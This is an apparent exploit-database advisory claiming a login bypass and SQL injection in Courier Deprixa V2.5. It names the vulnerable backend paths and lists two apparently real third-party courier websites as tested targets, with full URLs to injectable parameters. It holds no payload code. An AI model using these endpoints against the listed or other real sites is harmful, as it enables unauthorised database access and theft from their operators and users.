.__  .__         .__  __          
  ____  __ __|  | |  |   _____|__|/  |_  ____  
 /    \|  |  \  | |  |  /  ___/  \   __\/ __ \ 
|   |  \  |  /  |_|  |__\___ \|  ||  | \  ___/ 
|___|  /____/|____/____/____  >__||__|  \___  >
     \/                     \/              \/ 
# Exploit Title: Courier Deprixa V2.5 login bypass+SQLi
# Date: 01/05/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: ???
# Software Link: Google
# Version: 2.5
# Tested on: Windows 10 
# CMS: Courier Deprixa V2.5
# Dork:???
# Vulnz: login bugged , SQLi

*PoC*
[code]

######################################################
/backend/login.php <= can be bypassed!               # <= Vulnz
/backend/deprixa/edit-courier.php?cid=[badcode]      #
######################################################

.................................................................................
#site tested1: https://denverxdeliveries.com/backend/login.php                   |#1
-https://denverxdeliveries.com/backend/deprixa/edit-courier.php?cid=64 <=[*SQLi*]|
.................................................................................

.........................................................................................
#site tested2: https://www.fedwixglobalpostcomp.com/backend/login.php                    |#2
-https://www.fedwixglobalpostcomp.com/backend/deprixa/edit-courier.php?cid=63 <=[*SQLi*] |
.........................................................................................

[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*